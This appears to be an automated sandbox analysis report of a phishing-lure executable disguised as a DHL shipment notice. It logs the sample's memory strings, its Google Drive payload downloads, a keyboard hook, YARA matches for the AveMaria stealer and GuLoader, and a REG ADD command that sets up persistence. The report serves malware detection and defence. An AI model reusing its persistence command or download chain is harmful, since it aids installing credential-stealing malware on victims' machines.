Source: explorer.exe, 0000000F.00000000.981394432.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5696107995.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.930505618.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000F.00000000.924171358.00000000096F1000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.974913981.00000000096F1000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5687107200.00000000096F1000.00000004.00000001.sdmp	String found in binary or memory: https://arc.msn.comr9
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: DHL Express shipment notification.exe, 0000000E.00000003.883756039.00000000019C0000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319155613.00000000018B1000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: images.exe, 0000001D.00000003.1324727893.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external
Source: DHL Express shipment notification.exe, 0000000E.00000003.883756039.00000000019C0000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319155613.00000000018B1000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: images.exe, 0000001D.00000003.1347566980.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319610421.00000000018CC000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319522456.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330037634.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330644774.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1324727893.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/
Source: images.exe, 0000001D.00000003.1319610421.00000000018CC000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319522456.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/#9
Source: images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidum
Source: DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-6k-docs.googleusercontent.com/
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp	String found in binary or memory: https://doc-10-6k-docs.googleusercontent.com/%%doc-10-6k-docs.googleusercontent.com
Source: DHL Express shipment notification.exe, 0000000E.00000002.1021086684.00000000019B3000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1016795564.00000000019C8000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.908533186.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.906400383.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-6k-docs.googleusercontent.com/XM
Source: DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe549
Source: images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleuserco
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/(
Source: DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319155613.00000000018B1000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g4
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g8D
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9gX
Source: DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9geJYQtWVvXHi4Ubp9Y
Source: DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe54913jcp7asj48qkhdgaodfoob7/1638383100000/11612195336931281153/*/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-6k-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
Source: global traffic	HTTP traffic detected: GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-74-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e%3Ddownload&hash=e91gtvc094ihcc9ia8q0ll4kbtb8mnkn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: docs.google.comCookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
Source: global traffic	HTTP traffic detected: GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download&nonce=g9j0jkqh8v4q0&user=13277406679786744507Z&hash=rku0rgkmu2p00qlf7mek88sknpvsopf2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: doc-0c-74-docs.googleusercontent.comCookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu_nonce=g9j0jkqh8v4q0

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.212.161:443 -> 192.168.11.20:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49766 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\ProgramData\images.exe

Windows user hook set: 0 keyboard low level C:\ProgramData\images.exe

Jump to behavior

Source: DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp

Binary or memory string: GetRawInputData

E-Banking Fraud:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Malicious sample detected (through community Yara rule)

Show sources

Source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown

Source: DHL Express shipment notification.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228AA34	5_2_0228AA34
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_02296860	5_2_02296860
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228D8CF	5_2_0228D8CF
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228DFFD	5_2_0228DFFD
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022939E4	5_2_022939E4
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022949D1	5_2_022949D1
Source: C:\ProgramData\images.exe	Code function: 21_2_0228AA34	21_2_0228AA34
Source: C:\ProgramData\images.exe	Code function: 21_2_02296860	21_2_02296860
Source: C:\ProgramData\images.exe	Code function: 21_2_0228D8CF	21_2_0228D8CF
Source: C:\ProgramData\images.exe	Code function: 21_2_0228DFFD	21_2_0228DFFD
Source: C:\ProgramData\images.exe	Code function: 21_2_022939E4	21_2_022939E4
Source: C:\ProgramData\images.exe	Code function: 21_2_022949D1	21_2_022949D1

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228AA34 NtWriteVirtualMemory,	5_2_0228AA34
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022960AF LoadLibraryA,NtProtectVirtualMemory,	5_2_022960AF
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228D8CF NtAllocateVirtualMemory,	5_2_0228D8CF
Source: C:\ProgramData\images.exe	Code function: 21_2_0228AA34 NtWriteVirtualMemory,	21_2_0228AA34
Source: C:\ProgramData\images.exe	Code function: 21_2_022960AF LoadLibraryA,NtProtectVirtualMemory,	21_2_022960AF
Source: C:\ProgramData\images.exe	Code function: 21_2_0228D8CF NtAllocateVirtualMemory,	21_2_0228D8CF

Source: DHL Express shipment notification.exe, 00000005.00000002.740264413.0000000002330000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSlesk8.exeFE2XJ vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 00000005.00000000.594334059.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 0000000E.00000000.735045174.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 0000000E.00000002.1030995382.000000001F243000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 0000000E.00000003.908372108.0000000001A08000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe

Source: DHL Express shipment notification.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.14.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\ProgramData\images.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\ProgramData\images.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"

Source: DHL Express shipment notification.exe

Static PE information: invalid certificate

Source: DHL Express shipment notification.exe	Virustotal: Detection: 25%
Source: DHL Express shipment notification.exe	ReversingLabs: Detection: 11%

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File read: C:\Users\user\Desktop\DHL Express shipment notification.exe

Jump to behavior

Source: DHL Express shipment notification.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\ProgramData\images.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL Express shipment notification.exe "C:\Users\user\Desktop\DHL Express shipment notification.exe"
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Users\user\Desktop\DHL Express shipment notification.exe "C:\Users\user\Desktop\DHL Express shipment notification.exe"
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Users\user\Desktop\DHL Express shipment notification.exe "C:\Users\user\Desktop\DHL Express shipment notification.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"	Jump to behavior
Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe	Jump to behavior
Source: C:\ProgramData\images.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe	Jump to behavior

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\Users\user\AppData\Roaming\XvFu5flZcgudIlwvVLtjOx372

Jump to behavior

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@15/2@6/6

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3240:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:304:WilStaging_02

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: DHL Express shipment notification.exe, 0000000E.00000003.906801058.0000000001A0D000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.1001852923.00000000134B0000.00000040.00000001.sdmp, images.exe, 0000001D.00000003.1347841343.00000000018DE000.00000004.00000001.sdmp
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: DHL Express shipment notification.exe, 0000000E.00000003.906801058.0000000001A0D000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.1001852923.00000000134B0000.00000040.00000001.sdmp, images.exe, 0000001D.00000003.1347841343.00000000018DE000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

